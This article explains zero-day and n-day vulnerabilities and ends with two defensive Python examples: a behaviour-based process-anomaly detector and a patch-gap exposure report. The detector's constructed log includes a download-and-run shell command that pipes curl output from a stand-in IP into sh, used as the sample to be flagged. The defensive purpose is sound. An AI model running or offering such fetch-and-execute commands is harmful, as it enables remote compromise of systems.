What is a Zero-day vulnerability?
A zero-day vulnerability is a flaw in software, firmware or a system's configuration that can be exploited by cyber-criminals, governments and other third parties, and for which the vendor has no patch available: the vendor has had "zero days" to prepare one. The flaw may stem from a programming error or from an insecure configuration. Once the vulnerability has been publicly disclosed it is no longer a zero-day; a vulnerability that is known but still unpatched on a system is referred to as a one-day or n-day vulnerability, n being the number of days defenders have had to respond.
Threat of vulnerabilities
Cyber-criminals write code that targets such a vulnerability; this code, usually bundled into malware, is called a zero-day exploit. The exploit uses the weakness to compromise computer systems, hardware and networks. A patch from the software vendor normally closes the hole, which raises the question: what if the vendor never notices the vulnerability?
Malware delivered through a zero-day exploit can compromise your data, give attackers access to your computer, install further malware, corrupt files and steal confidential information. The exploit can reach a system through a variety of channels, such as web browsing, email attachments and infected removable media.
A zero-day attack is one in which a vulnerability is exploited before the software vendor has had the chance to fix it with a patch. The vulnerability itself is often discovered only months or years after it first became exploitable.
Impact of Dark Web
The dark web is a market for all kinds of cyber-crime tooling, including zero-day vulnerabilities and the exploits for them. This market does not discriminate between buyers: it sells to governments, but also to organised crime groups, cyber-criminals, freelance hackers and hostile states such as North Korea and Iran. The dark market has no restrictions at all, unlike the grey market, where brokers refuse to sell to countries such as North Korea.
Delayed patching may be worse than zero-days
Zero-days can be damaging for companies, but much of the damage is preventable. Often a vendor releases a security patch and the affected devices, especially IoT devices, are never updated. As a result, publicly known but unpatched vulnerabilities are frequently more valuable to attackers than true zero-days: an overt zero-day attack brings the vulnerability to light and forces the victim organisation to respond, whereas a known vulnerability that nobody patches can be exploited again and again.
A covert attack, by contrast, is dangerous precisely because of its anonymity and its ability to stay undetected. Government agencies such as the NSA, CIA and FBI often use zero-day exploits as opportunities to catch cyber-criminals red-handed rather than reporting the vulnerabilities to the affected vendors. Hostile states use the same tools carefully to conduct covert cyber-warfare operations.
Detection of zero-day vulnerabilities
Zero-day vulnerabilities are hard to identify. Because no attack signature exists yet, signature-based anti-malware, intrusion detection and intrusion prevention systems cannot recognise the exploit itself. What can be caught is what happens afterwards: behaviour analytics that baselines normal activity and flags abnormal patterns of usage across hosts and networks (a web server process suddenly spawning a shell, an unusual outbound connection, a service touching files it never touched before) is the most practical way to detect zero-day exploitation in progress.
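The following script is an added example, written for this article rather than taken from it or from any product, of the behaviour-based approach described above. It learns which parent-to-child process pairs are normal for each host during a baseline window and then scores new process-creation events by how far they depart from that baseline, so a web server spawning a shell is flagged even though no signature for the exploit exists. The log lines and their field layout (timestamp, host, parent, child, command line) are constructed for the example and follow no real product's format.

```python
"""Behaviour-based detection of zero-day exploitation (added example).

Illustrative code written for this article, not from the original page or
any vendor. Rather than matching a signature of a known exploit, it learns
which parent -> child process pairs are normal per host from a baseline
window and scores new process-creation events against that baseline. The
log lines and the field layout (timestamp host parent child command-line)
are constructed for the example and follow no real product's format.
"""
from collections import Counter, defaultdict

# Constructed baseline: a period of normal activity on two hosts.
BASELINE_LOGS = """\
2024-03-01T09:00:01 web01 nginx nginx worker process
2024-03-01T09:00:05 web01 systemd sshd /usr/sbin/sshd -D
2024-03-01T09:01:10 web01 sshd bash -bash
2024-03-01T09:02:00 web01 cron run-parts /etc/cron.hourly
2024-03-01T09:02:30 web01 nginx nginx worker process
2024-03-01T09:03:00 db01 systemd postgres postgres -D /var/lib/pgsql/data
2024-03-01T09:03:30 db01 postgres postgres checkpointer
2024-03-01T09:04:00 web01 nginx nginx worker process
2024-03-01T09:05:00 web01 sshd bash -bash
"""

# Constructed events from the following night. The first two show a web
# server process spawning a shell that fetches and runs something, which is
# what post-exploitation of a web-facing zero-day typically looks like.
NEW_EVENTS = """\
2024-03-02T03:14:07 web01 nginx sh /bin/sh -c 'curl -s http://198.51.100.7/p | sh'
2024-03-02T03:14:08 web01 sh curl curl -s http://198.51.100.7/p
2024-03-02T09:00:02 web01 nginx nginx worker process
2024-03-02T09:01:00 db01 postgres postgres checkpointer
2024-03-02T09:02:00 web01 sshd bash -bash
"""

# Programs whose appearance as a child of a network service is suspicious.
SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe"}
ALERT_THRESHOLD = 3


def parse_event(line):
    """Split one constructed log line into its five fields."""
    ts, host, parent, child, cmdline = line.split(None, 4)
    return {"ts": ts, "host": host, "parent": parent, "child": child, "cmdline": cmdline}


def build_baseline(text):
    """Count parent->child pairs per host and record which parents ever spawned a shell."""
    pairs = defaultdict(Counter)
    shell_parents = set()
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        pairs[ev["host"]][(ev["parent"], ev["child"])] += 1
        if ev["child"] in SHELLS:
            shell_parents.add(ev["parent"])
    return {"pairs": pairs, "shell_parents": shell_parents}


def score_event(ev, baseline):
    """Return an anomaly score for one event together with the reasons behind it."""
    pair = (ev["parent"], ev["child"])
    score, reasons = 0, []
    if pair not in baseline["pairs"].get(ev["host"], Counter()):
        score += 2
        reasons.append(f"{pair[0]}->{pair[1]} never seen on {ev['host']}")
        if not any(pair in c for c in baseline["pairs"].values()):
            score += 1
            reasons.append("pair never seen on any host")
    if ev["child"] in SHELLS and ev["parent"] not in baseline["shell_parents"]:
        score += 3
        reasons.append(f"{ev['parent']} never spawned a shell in the baseline")
    return score, reasons


def detect(text, baseline, threshold=ALERT_THRESHOLD):
    """Return the events whose score reaches the threshold, with score and reasons attached."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        score, reasons = score_event(ev, baseline)
        if score >= threshold:
            alerts.append({**ev, "score": score, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect(NEW_EVENTS, build_baseline(BASELINE_LOGS)):
        print(f"{a['ts']} {a['host']} score={a['score']} "
              f"{a['parent']}->{a['child']}: {'; '.join(a['reasons'])}")
```

Run against the constructed events, only the two 03:14 entries are reported: nginx spawning sh scores 6 (novel pair on the host, novel fleet-wide, and a service that never spawned a shell), and the follow-on sh spawning curl scores 3. The daytime entries match the baseline and score 0. In a real deployment the baseline would be built from days of endpoint telemetry and the weights tuned per environment, but the principle is the same: score deviation from observed behaviour rather than matching a signature that does not yet exist.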
How can you protect yourself?
Zero-day vulnerabilities may be difficult to detect, but they are not impossible to defend against. Several measures help:
1. Segment the network so that sensitive traffic between servers is isolated from user and internet-facing segments (for example on their own VLANs), limiting how far an attacker who exploits one host can reach.
2. Use IPsec, the IP security protocol, which encrypts and authenticates IP packets in transit so that traffic between servers cannot be read or tampered with on the network.
3. Use intrusion detection and intrusion prevention systems, which can warn firms of suspicious user or system activity that may be the sign of an incoming zero-day attack.
4. Keep all systems and devices current with the latest software patches and security updates, use firewalls and follow the security policies set by the company.
5. Follow public vulnerability disclosures (vendor advisories and CVE feeds) so that you learn of newly reported issues as soon as they are made public, and track which of your own systems are affected.
6. Run a bug bounty programme that pays ethical hackers to report vulnerabilities in the organisation's systems. These rewards cost a firm far less than a zero-day attack.
7. Use vulnerability scanning services, such as those offered by Cyber Chasse, to identify security weaknesses in the firm's network or systems.
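Steps 4 and 5 above, and the earlier point that unpatched known vulnerabilities are often more useful to attackers than true zero-days, come down to one question: which of my systems are still running a version older than the fix, and for how long? The script below is an added example, written for this article and not taken from it or from any vendor, that answers it from an inventory of installed versions and a list of advisories giving the fixed-in version and its publication date. Every host, product name, version, advisory ID and date in it is fictitious and constructed for the example.

```python
"""Patch-gap report (added example).

Illustrative code written for this article, not from the original page or
any vendor. Given an inventory of installed software versions and a list of
advisories stating the version each issue was fixed in and when that fix was
published, it reports every host still running a vulnerable version and how
many days it has been exposed. All product names, versions, advisory IDs,
hosts and dates below are fictitious and constructed for the example.
"""
import re
from collections import defaultdict
from datetime import date

INVENTORY = [  # constructed
    {"host": "web01", "product": "webfront", "version": "1.24.0"},
    {"host": "web02", "product": "webfront", "version": "1.26.1"},
    {"host": "cam-lobby", "product": "ipcam-fw", "version": "2.3.9"},
    {"host": "db01", "product": "dbcore", "version": "16.3"},
]

ADVISORIES = [  # constructed; the IDs are placeholders, not real identifiers
    {"id": "ADV-0001", "product": "webfront", "fixed_in": "1.26.0", "published": date(2024, 5, 29)},
    {"id": "ADV-0002", "product": "ipcam-fw", "fixed_in": "2.4.0", "published": date(2023, 1, 10)},
    {"id": "ADV-0003", "product": "dbcore", "fixed_in": "16.3", "published": date(2024, 5, 9)},
]

REPORT_DATE = date(2024, 6, 30)  # constructed "today" for the report


def parse_version(v):
    """Turn '1.26.0' or '2.4.0-rc1' into a comparable key.

    Numeric components compare as integers (so 1.10 > 1.9), missing
    components count as 0 (so 1.26 == 1.26.0), and a pre-release tag sorts
    below the final release it precedes.
    """
    release, _, tail = v.partition("-")
    nums = [int(x) for x in re.findall(r"\d+", release)]
    nums += [0] * (3 - len(nums))
    return tuple(nums), tail == ""


def is_vulnerable(installed, fixed_in):
    """True when the installed version is older than the version carrying the fix."""
    return parse_version(installed) < parse_version(fixed_in)


def exposure_report(inventory, advisories, today):
    """Rows of host/advisory/installed/fixed_in/days_exposed, longest exposure first."""
    by_product = defaultdict(list)
    for adv in advisories:
        by_product[adv["product"]].append(adv)
    rows = []
    for item in inventory:
        for adv in by_product.get(item["product"], []):
            if is_vulnerable(item["version"], adv["fixed_in"]):
                rows.append({
                    "host": item["host"],
                    "advisory": adv["id"],
                    "installed": item["version"],
                    "fixed_in": adv["fixed_in"],
                    "days_exposed": (today - adv["published"]).days,
                })
    return sorted(rows, key=lambda r: r["days_exposed"], reverse=True)


if __name__ == "__main__":
    for r in exposure_report(INVENTORY, ADVISORIES, REPORT_DATE):
        print(f"{r['host']:10} {r['advisory']} installed {r['installed']} "
              f"< fixed {r['fixed_in']}, exposed {r['days_exposed']} days")
```

On the constructed data the report lists the lobby camera first, 537 days behind a firmware fix, then web01 at 32 days; db01 is on exactly the fixed version and web02 is ahead of it, so neither appears. The same comparison logic can be fed from a real asset inventory and the vendor advisory feeds mentioned in step 5; the number that matters is the days-exposed column, because that is the window in which the vulnerability is an n-day for you and a free exploit for anyone watching the disclosure.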